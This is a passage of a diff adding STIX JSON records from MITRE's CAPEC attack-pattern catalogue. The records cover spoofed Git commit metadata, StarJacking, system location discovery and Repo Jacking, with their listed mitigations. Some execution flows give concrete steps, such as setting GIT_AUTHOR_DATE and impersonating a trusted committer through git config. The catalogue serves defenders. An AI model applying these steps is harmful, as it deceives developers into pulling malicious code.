"3.9" + 
}, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "After downloading open-source software, ensure integrity values have not changed.", + "id": "course-of-action--760cd567-fe77-43b8-bd40-b612331562da", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--52eb880e-2ac1-4c33-9b9a-eac91f006aa8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--760cd567-fe77-43b8-bd40-b612331562da", + "spec_version": "2.1", + "target_ref": "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Before executing or incorporating the software, leverage automated testing techniques (e.g., static and dynamic analysis) to determine if the software behaves maliciously.", + "id": "course-of-action--4c1ee87f-e7db-4b4b-a3ab-a9bf2ef24557", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e9315979-36e7-483d-9185-50c390965b76", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4c1ee87f-e7db-4b4b-a3ab-a9bf2ef24557", + "spec_version": "2.1", + "target_ref": "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary spoofs metadata pertaining to a Version Control System (VCS) (e.g., Git) repository's commits to deceive users into believing that the maliciously provided software is frequently maintained and originates from a trusted source.\n ", + "external_references": [ + { + "external_id": "CAPEC-692", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/692.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Aviad Gershon, Unverified Commits: Are You Unknowingly Trusting Attackers’ Code?, 2022--07---15, Checkmarx", + "external_id": "REF-719", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/unverified-commits-are-you-unknowingly-trusting-attackers-code/" + }, + { + "description": "Deeba Ahmed, Hackers can spoof commit metadata to create false GitHub repositories, 2022--07---17, HackRead", + "external_id": "REF-720", + "source_name": "reference_from_CAPEC", + "url": "https://www.hackread.com/hackers-spoof-commit-metadata-false-github-repositories/" + } + ], + "id": "attack-pattern--e6eccd63-6c72-4500-830e-22c937a2bd4b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Spoof Version Control System Commit Metadata", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + 
"attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "In July 2022, Checkmarx reported that GitHub commit metadata could be spoofed if unsigned commits were leveraged by the repository. Adversaries were able to spoof commit contributors, as well as the date/time of the commit. This resulted in commits appearing to originate from trusted developers and a GitHub activity graph that duped users into believing that the repository had been maintained for a significant period of time. The lack of commit metadata validation ultimately allowed adversaries to propagate malware to unsuspecting victims [REF-719] [REF-720]." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target: The adversary must first identify a target repository for them to spoof. Typically, this will be a popular and widely used repository, as to increase the amount of victims a successful attack will exploit.

Experiment

  1. Create malicious repository: The adversary must create a malicious repository that imitates the legitimate repository being spoofed. This may include creating a username that closely matches the legitimate repository owner; creating a repository name that closely matches the legitimate repository name; uploading the legitimate source code; and more.

  2. Spoof commit metadata: Once the malicious repository has been created, the adversary must then spoof the commit metadata to make the repository appear to be frequently maintained and originating from trusted sources.

  3. Techniques
    Git Commit Timestamps: The adversary generates numerous fake commits while setting the \"GIT_AUTHOR_DATE\" and \"GIT_COMMITTER_DATE\" environment variables to a date which is to be spoofed.
    Git Commit Contributors: The adversary obtains a legitimate and trusted user's email address and then sets this information via the \"git config\" command. The adversary can then commit changes leveraging this username.

Exploit

  1. Exploit victims: The adversary infiltrates software and/or system environments with the goal of conducting additional attacks.

  2. Techniques
    Active: The adversary attempts to trick victims into downloading the malicious software by means such as phishing and social engineering.
    Passive: The adversary waits for victims to download and leverage malicious software.
", + "x_capec_extended_description": "\n Version Control Systems are widely used by developers to host, track, and manage source code files in an easy and synchronous manner. These systems are often leveraged to host open-source software that other developers can incorporate into their own applications or use as standalone applications. To prevent downloading vulnerable and/or malicious code, developers will often check the metadata of VCS repository commits to determine the repository's overall pedigree. This may include a variety of information, such as the following:\n \n Owner of the repository\n Author(s) of commits\n Frequency of commits\n Date/Time of commits\n Repository activity graphs\n \n These precursory checks can assist developers in determining whether a trusted individual/organization is providing the source code, how often the code is updated, and the relative popularity of the software. However, an adversary can spoof this metadata to make a repository containing malicious code appear as originating from a trusted source, being frequently maintained, and being commonly used by other developers. Without performing additional security activities, unassuming developers may be duped by this spoofed metadata and include the malicious code within their systems/applications. The adversary is then ultimately able to achieve numerous negative technical impacts, while the victim remains unaware of any malicious activity.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Identification of a popular open-source repository whose metadata is to be spoofed." + ], + "x_capec_skills_required": { + "Medium": "Ability to spoof a variety of repository metadata to convince victims the source is trusted." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a72b8ce4-be42-4668-a7c7-bf42c0c9a408", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c736e80-28c8-4d55-b991-897bf3b192ba", + "spec_version": "2.1", + "target_ref": "attack-pattern--e6eccd63-6c72-4500-830e-22c937a2bd4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8f777fea-dec1-4d43-ad73-97e207a594cd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a204dbb2-3715-4055-8ac3-8f999c400a40", + "spec_version": "2.1", + "target_ref": "attack-pattern--e6eccd63-6c72-4500-830e-22c937a2bd4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6c36b44-edcc-444c-8c35-21a03d8ee380", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c80df8f5-a98b-488d-8935-509df5316146", + "spec_version": "2.1", + "target_ref": "attack-pattern--e6eccd63-6c72-4500-830e-22c937a2bd4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--de99bf76-30c8-4404-93f4-f13f77c8c840", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6766b25b-c346-4b4b-8542-35002e050f31", + "spec_version": "2.1", + "target_ref": "attack-pattern--e6eccd63-6c72-4500-830e-22c937a2bd4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c4960b11-f2fc-4d00-8514-1091d252ab75", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--760cd567-fe77-43b8-bd40-b612331562da", + "spec_version": "2.1", + "target_ref": "attack-pattern--e6eccd63-6c72-4500-830e-22c937a2bd4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--35081dad-0306-4c1a-8b0f-a021e8e1c1f3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4c1ee87f-e7db-4b4b-a3ab-a9bf2ef24557", + "spec_version": "2.1", + "target_ref": "attack-pattern--e6eccd63-6c72-4500-830e-22c937a2bd4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary spoofs software popularity metadata to deceive users into believing that a maliciously provided package is widely used and originates from a trusted source.\n ", + "external_references": [ + { + "external_id": "CAPEC-693", + "source_name": 
"capec", + "url": "https://capec.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Tzachi Zornstein, StarJacking – Making Your New Open Source Package Popular in a Snap, 2022--04---19, Checkmarx", + "external_id": "REF-721", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/starjacking-making-your-new-open-source-package-popular-in-a-snap/" + } + ], + "id": "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "StarJacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "In April 2022, Checkmarx reported that packages hosted on NPM, PyPi, and Yarn do not properly validate that the provided GitHub repository URL actually pertains to the package being provided. Combined with additional attacks such as TypoSquatting, this allows adversaries to spoof popularity metadata by associating popular GitHub repository URLs with the malicious package. This can further lead to developers unintentionally including the malicious package within their development environments [REF-721]." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target: The adversary must first identify a target package whose popularity statistics will be leveraged. This will be a popular and widely used package, as to increase the perceived pedigree of the malicious package.

Experiment

  1. Spoof package popularity: The adversary provides their malicious package to a package manager and uses the source code repository URL identified in Step 1 to spoof the popularity of the package. This malicious package may also closely resemble the legitimate package whose statistics are being utilized.

Exploit

  1. Exploit victims: The adversary infiltrates development environments with the goal of conducting additional attacks.

  2. Techniques
    Active: The adversary attempts to trick victims into downloading the malicious package by means such as phishing and social engineering.
    Passive: The adversary waits for victims to download and leverage the malicious package.
", + "x_capec_extended_description": "\n Many open-source software packages are hosted via third-party package managers (e.g., Node Package Manager, PyPi, Yarn, etc.) that allow for easy integration of software components into existing development environments. A package manager will typically include various metadata about the software and often include a link to the package's source code repository, to assist developers in determining the trustworthiness of the software. One common statistic used in this decision-making process is the popularity of the package. This entails checking the amount of \"Stars\" the package has received, which the package manager displays based on the provided source code repository URL. However, many package managers do not validate the connection between the package and source code repository being provided. Adversaries can thus spoof the popularity statistic of a malicious package by associating a popular source code repository URL with the package. This can ultimately trick developers into unintentionally incorporating the malicious package into their development environment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Identification of a popular open-source package whose popularity metadata is to be used for the malicious package." + ], + "x_capec_skills_required": { + "Low": "Ability to provide a package to a package manager and associate a popular package's source code repository URL." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Before downloading open-source packages, perform precursory metadata checks to determine the author(s), frequency of updates, when the software was last updated, and if the software is widely leveraged.", + "id": "course-of-action--e7cd94ea-7540-46fe-9c3d-b733cc6c99a4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--121521c5-1405-4f51-a48a-37cafa458320", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e7cd94ea-7540-46fe-9c3d-b733cc6c99a4", + "spec_version": "2.1", + "target_ref": "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Look for conflicting or non-unique repository references to determine if multiple packages share the same repository reference.", + "id": "course-of-action--7c548f97-7bf6-4c36-a45b-b398c4d12510", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6156b485-fc27-474d-8a38-7cf7ec87b01f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c548f97-7bf6-4c36-a45b-b398c4d12510", + "spec_version": "2.1", + "target_ref": "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39f9a1c9-9ce1-4bf9-83ef-c834b884842a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a204dbb2-3715-4055-8ac3-8f999c400a40", + "spec_version": "2.1", + "target_ref": "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only download open-source packages from reputable package managers.", + "id": "course-of-action--8a83580e-2107-4544-96a2-1fa66d034fd0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a535c2f9-17fa-48e9-8df4-4b1a11500540", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--8a83580e-2107-4544-96a2-1fa66d034fd0", + "spec_version": "2.1", + "target_ref": "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "After downloading open-source packages, ensure integrity values have not changed.", + "id": "course-of-action--7a44241f-74a4-48d1-ac7c-13697e53cdc7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7b24cf80-b39b-4468-b413-3d55da744848", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7a44241f-74a4-48d1-ac7c-13697e53cdc7", + "spec_version": "2.1", + "target_ref": "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Before executing or incorporating the package, leverage automated testing techniques (e.g., static and dynamic analysis) to determine if the software behaves maliciously.", + "id": "course-of-action--4b83b151-8ca4-439e-bd2a-a39d24160e2f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a81e3538-db6b-4c00-bdd2-de44d84670da", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4b83b151-8ca4-439e-bd2a-a39d24160e2f", + "spec_version": "2.1", + "target_ref": "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary collects information about the target system in an attempt to identify the system's geographical location.\n Information gathered could include keyboard layout, system language, and timezone. This information may benefit an adversary in confirming the desired target and/or tailoring further attacks.\n ", + "external_references": [ + { + "external_id": "CAPEC-694", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/694.html" + }, + { + "external_id": "CWE-497", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/497.html" + }, + { + "description": "System Language Discovery", + "external_id": "T1614", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1614" + }, + { + "description": "Language-Specific Registry Entries", + "external_id": "REF-727", + "source_name": "reference_from_CAPEC", + "url": "https://learn.microsoft.com/en-us/previous-versions/windows/desktop/indexsrv/language-specific-registry-entries" + }, + { + "description": "winnls.h header", + "external_id": "REF-728", + "source_name": "reference_from_CAPEC", + "url": "https://learn.microsoft.com/en-us/windows/win32/api/winnls/" + }, + { + "description": "local (1p) - Linux Man Pages", + "external_id": "REF-729", + "source_name": "reference_from_CAPEC", + "url": 
"https://www.systutorials.com/docs/linux/man/1p-locale/" + }, + { + "description": "vconsole.conf", + "external_id": "REF-730", + "source_name": "reference_from_CAPEC", + "url": "https://www.freedesktop.org/software/systemd/man/vconsole.conf.html" + }, + { + "description": "timedatectl", + "external_id": "REF-731", + "source_name": "reference_from_CAPEC", + "url": "https://www.freedesktop.org/software/systemd/man/timedatectl.html" + } + ], + "id": "attack-pattern--296d0305-8a72-4f50-b702-cc56e90a7749", + "modified": "2022-09-29T00:00:00.000Z", + "name": "System Location Discovery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. System Locale Information Discovery: The adversary examines system information from various sources such as registry and native API functions and correlates the gathered information to infer the geographical location of the target system

  2. Techniques
    Registry Query: Query the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language\\Language_Dialect on Windows to obtain system language, Computer\\HKEY_CURRENT_USER\\Keyboard Layout\\Preload to obtain the hexadecimal language IDs of the current user's preloaded keyboard layouts, and Computer\\HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation to obtain the system timezone configuration
    Native API Requests: Parse the outputs of Windows API functions GetTimeZoneInformation, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList and GetUserDefaultLangID to obtain information about languages, keyboard layouts, and timezones installed on the system or on macOS or Linux systems, query locale to obtain the $LANG environment variable and view keyboard layout information or use timeanddatectl status to show the system clock settings.
    Read Configuration Files: For macOS and Linux-based systems, view the /etc/vconsole.conf file to get information about the keyboard mapping and console font.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have some level of access to the system and have a basic understanding of the operating system in order to query the appropriate sources for relevant information." + ], + "x_capec_resources_required": [ + "The adversary requires access to the target's operating system tools to query relevant system information. On windows, registry queries can be conducted with powershell, wmi, or regedit. On Linux or macOS, queries can be performed with through a shell." + ], + "x_capec_skills_required": { + "Low": "The adversary must know how to query various system sources of information respective of the system's operating system to obtain the relevant information." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very Low", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To reduce the amount of information gathered, one could disable various geolocation features of the operating system not required for system operation.", + "id": "course-of-action--bd4e4c20-69fb-4a3a-bc82-a775ce196516", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-694-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--30d76a29-95d8-4907-ba95-9c42d2ec7b3f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bd4e4c20-69fb-4a3a-bc82-a775ce196516", + "spec_version": "2.1", + "target_ref": "attack-pattern--296d0305-8a72-4f50-b702-cc56e90a7749", + "type": 
"relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary takes advantage of the redirect property of directly linked Version Control System (VCS) repositories to trick users into incorporating malicious code into their applications.\n ", + "external_references": [ + { + "external_id": "CAPEC-695", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/695.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Indiana Moreau, Repo Jacking: Exploiting the Dependency Supply Chain, 2020--10---22, Security Innovation", + "external_id": "REF-722", + "source_name": "reference_from_CAPEC", + "url": "https://www.concretecms.org/about/project-news/security/supply-chain-hack-phpass-repo-jacking" + }, + { + "description": "Theo Burton, CyRC Vulnerability Analysis: Repo jacking in the software supply chain, 2022--08---02, Synopsys", + "external_id": "REF-732", + "source_name": "reference_from_CAPEC", + "url": "https://www.synopsys.com/blogs/software-security/cyrc-vulnerability-analysis-repo-jacking/" + }, + { + "description": "Jossef Harush, Attacker Caught Hijacking Packages Using Multiple Techniques to Steal AWS Credentials, 2022--05---25, Checkmarx", + "external_id": "REF-733", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/attacker-caught-hijacking-packages-using-multiple-techniques-to-steal-aws-credentials/" + }, + { + "description": "Jossef Harush, 
GitHub RepoJacking Weakness Exploited in the Wild by Attackers, 2022--05---27, Checkmarx", + "external_id": "REF-734", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/github-repojacking-weakness-exploited-in-the-wild-by-attackers/" + } + ], + "id": "attack-pattern--e3dd79e7-307b-42dd-9e22-d0345c0ec001", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Repo Jacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Read Data", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Communications", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n In May 2022, the CTX Python package and PhPass PHP package were both exploited by the same adversary via Repo Jacking attacks. For the CTX package, the adversary performed an account takeover via a password reset, due to an expired domain-hosting email. The attack on PhPass entailed bypassing GitHub's authentication for retired repositories. In both cases, sensitive data in the form of API keys and passwords, each stored in the form of environment variables, were exfiltrated. [REF-732] [REF-733]\n ", + "\n In October 2021, the popular JavaScript library UAParser.js was exploited via the takeover of the author's Node Package Manager (NPM) account. The adversary-provided malware downloaded and executed binaries from a remote server to conduct crypto-mining and to exfiltrate sensitive data on Windows systems. 
This was a wide-scale attack as the package receives 8 to 9 million downloads per week. [REF-732]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target: The adversary must first identify a target repository that is commonly used and whose owner/maintainer has either changed/deleted their username or transferred ownership of the repository and then deleted their account. The target should typically be a popular and widely used package, as to increase the scope of the attack.

Experiment

  1. Recreate initial repository path: The adversary re-registers the account that was renamed/deleted by the target repository's owner/maintainer and recreates the target repository with malicious code intended to exploit an application. These steps may need to happen in reverse (i.e., recreate repository and then rename an existing account to the target account) if protections are in place to prevent repository reuse.

Exploit

  1. Exploit victims: The adversary's malicious code is incorporated into applications that directly reference the initial repository, which further allows the adversary to conduct additional attacks.

